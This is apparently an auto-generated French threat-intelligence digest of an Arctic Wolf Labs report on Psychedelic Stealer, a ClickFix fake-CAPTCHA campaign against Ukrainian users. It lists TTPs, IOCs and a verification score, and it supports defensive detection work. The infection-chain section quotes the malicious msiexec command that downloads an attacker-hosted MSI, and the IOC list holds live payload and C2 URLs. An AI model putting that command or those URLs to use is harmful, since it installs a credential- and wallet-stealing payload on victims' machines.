🔍 Contexte

Arctic Wolf Labs a publiĂ© le 24 septembre 2026 une analyse technique dĂ©taillĂ©e d’une campagne en cours ciblant principalement des utilisateurs ukrainiens via des sites web lĂ©gitimes compromis.

🎯 Vecteur d’infection

Les attaquants ont injectĂ© des iframes malveillants dans plusieurs sites d’entreprises ukrainiennes lĂ©gitimes (clinique capillaire, fabricant de maquettes, libraire, Ă©tablissement psychologique, revendeur d’outils, revendeur automobile). L’iframe charge une fausse page de vĂ©rification Cloudflare en langue ukrainienne, imitant un CAPTCHA authentique.

La technique ClickFix est utilisĂ©e : au clic sur le CAPTCHA, une commande msiexec.exe est copiĂ©e dans le presse-papiers, et l’utilisateur est invitĂ© Ă  la coller dans la boĂźte de dialogue Windows Run pour dĂ©clencher l’installation.

⚙ ChaĂźne d’infection

  1. Visite d’un site ukrainien compromis
  2. Chargement de l’iframe attaquant via fsputnik[.]com/tds/tracker.js
  3. Affichage de la fausse page CAPTCHA Cloudflare
  4. Copie automatique d’une commande msiexec /i https://uasputnik[.]com/elita.msi /passive dans le presse-papiers
  5. L’utilisateur exĂ©cute la commande via Windows+R
  6. TĂ©lĂ©chargement et installation du MSI → dĂ©ploiement de psychedeliclove.exe

🩠 Analyse de Psychedelic Stealer

Le payload final est un exĂ©cutable Windows 64 bits contenant le tag de configuration embarquĂ© “Psychedelic”. Ses capacitĂ©s incluent :

  • Vol de credentials navigateur : Chrome, Edge, Brave, Opera, Opera GX, Vivaldi, Yandex (Chromium-based)
  • Vol de tokens de compte : extraction depuis la base Web Data Chromium
  • Vol de wallets crypto : extensions MetaMask, Trust Wallet, OKX Wallet, SafePal ; applications desktop Exodus, Atomic Wallet, Electrum, Bitcoin Core, Litecoin Core
  • DĂ©ploiement de composants navigateur : bridge native messaging com.lunex.explorer, fichiers host.ps1, host.bat
  • Persistance : tĂąche planifiĂ©e nommĂ©e psychedelicloveUtils
  • Profilage hĂŽte : nom machine, OS, CPU, GPU, RAM, disque, fuseau horaire, langue, MAC, statut admin, antivirus
  • C2 avec tasking distant : support EXE, COM, BAT, CMD, MSI, PowerShell pour exĂ©cution de payloads additionnels

đŸ–„ïž Infrastructure

  • Domaine leurre : uasputnik[.]com (enregistrĂ© le 9 septembre 2026)
  • IP associĂ©e : 176.53.159[.]40 (AS154383, ZORNTECH WEB SOLUTIONS)
  • C2 implant : 193.178.159[.]128:8080
  • TĂ©lĂ©chargement payload : 107.175.82[.]242:9000/wilow/psychedeliclove.exe
  • Panel de gestion : brandĂ© “РУБЛЁВКА TDS”, avec commentaires HTML en russe et lang="ru"

📊 TĂ©lĂ©mĂ©trie du panel

Le panel exposĂ© a enregistrĂ© 557 vues, 426 clics et 79 Ă©vĂ©nements “complete” dans 32 pays. L’Ukraine reprĂ©sente 446 vues (80%), suivie des États-Unis (31), de la Pologne (16) et de l’Allemagne (12).

đŸ·ïž Type d’article

Analyse technique et rapport de recherche publié par Arctic Wolf Labs, visant à documenter une nouvelle famille de malware non attribuée, fournir des IOCs exploitables et des pistes de détection pour les équipes SOC.

🧠 TTPs et IOCs dĂ©tectĂ©s

TTP

  • T1189 — Drive-by Compromise (Initial Access)
  • T1059.001 — Command and Scripting Interpreter: PowerShell (Execution)
  • T1204.002 — User Execution: Malicious File (Execution)
  • T1218.007 — System Binary Proxy Execution: Msiexec (Defense Evasion)
  • T1547.005 — Boot or Logon Autostart Execution: Security Support Provider (Persistence)
  • T1053.005 — Scheduled Task/Job: Scheduled Task (Persistence)
  • T1555.003 — Credentials from Password Stores: Credentials from Web Browsers (Credential Access)
  • T1539 — Steal Web Session Cookie (Credential Access)
  • T1082 — System Information Discovery (Discovery)
  • T1041 — Exfiltration Over C2 Channel (Exfiltration)
  • T1071.001 — Application Layer Protocol: Web Protocols (Command and Control)
  • T1105 — Ingress Tool Transfer (Command and Control)
  • T1176 — Browser Extensions (Persistence)
  • T1027 — Obfuscated Files or Information (Defense Evasion)
  • T1566 — Phishing (Initial Access)

IOC

  • IPv4 : 176.53.159.40 — AbuseIPDB · VT · ThreatFox
  • IPv4 : 107.175.82.242 — AbuseIPDB · VT · ThreatFox
  • IPv4 : 193.178.159.128 — AbuseIPDB · VT · ThreatFox
  • Domaines : uasputnik.com — VT · URLhaus · ThreatFox
  • Domaines : fsputnik.com — VT · URLhaus · ThreatFox
  • URLs : https://uasputnik.com/sputnik.html — URLhaus
  • URLs : https://uasputnik.com/elita.msi — URLhaus
  • URLs : https://uasputnik.com/admin777111777.php — URLhaus
  • URLs : http://107.175.82.242:9000/wilow/psychedeliclove.exe — URLhaus
  • URLs : http://193.178.159.128:8080 — URLhaus
  • SHA256 : 38e90affe37342ee36917cdc535fe9bf04589afa8430eb8d1ba1016adcfc1878a — VT · MalwareBazaar
  • SHA256 : 06f434695f93d7fd11eeff71358ff69fed79d310a66d993bbcc4ff979c117c90 — VT · MalwareBazaar
  • Fichiers : elita.msi
  • Fichiers : miks.msi
  • Fichiers : sova.msi
  • Fichiers : psychedeliclove.exe
  • Fichiers : host.ps1
  • Fichiers : host.bat
  • Fichiers : com.lunex.explorer.json
  • Fichiers : executed_tasks.json
  • Fichiers : wd_tmp.db

⚠ À propos de ces IOC — ils sont extraits automatiquement de l’article original le 25 septembre 2026 et n’ont pas fait l’objet d’une vĂ©rification externe. Un indicateur peut avoir Ă©tĂ© rĂ©attribuĂ© depuis : une IP de C2 peut redevenir un service lĂ©gitime, un domaine sinkholĂ© peut changer de propriĂ©taire. Aucune garantie d’exactitude ni d’actualitĂ© — contrĂŽlez leur validitĂ© avant tout usage opĂ©rationnel, en particulier avant de les injecter dans une blocklist ou un SIEM.

Malware / Outils

  • Psychedelic Stealer (stealer)

🟱 Indice de vĂ©rification factuelle : 90/100 (haute)

  • ✅ arcticwolf.com — source reconnue (liste interne) (20pts)
  • ✅ 33344 chars — texte complet (fulltext extrait) (15pts)
  • ✅ 21 IOCs dont des hashes (15pts)
  • ✅ 5/10 IOCs confirmĂ©s (AbuseIPDB, MalwareBazaar, ThreatFox, URLhaus, VirusTotal) (15pts)
  • ✅ 15 TTPs MITRE identifiĂ©es (15pts)
  • ✅ date extraite du HTML source (10pts)
  • ⬜ aucun acteur de menace nommĂ© (0pts)
  • ⬜ pas de CVE Ă  vĂ©rifier (0pts)

IOCs confirmés externellement :

  • 176.53.159.40 (ip) → VT (3/91 dĂ©tections)
  • 107.175.82.242 (ip) → VT (8/91 dĂ©tections)
  • 193.178.159.128 (ip) → VT (4/91 dĂ©tections)
  • 06f434695f93d7fd
 (sha256) → VT (50/76 dĂ©tections)
  • uasputnik.com (domain) → VT (17/91 dĂ©tections)

🔗 Source originale : https://arcticwolf.com/resources/blog/psychedelic-stealer-fake-clickfix-captcha-targets-ukraine/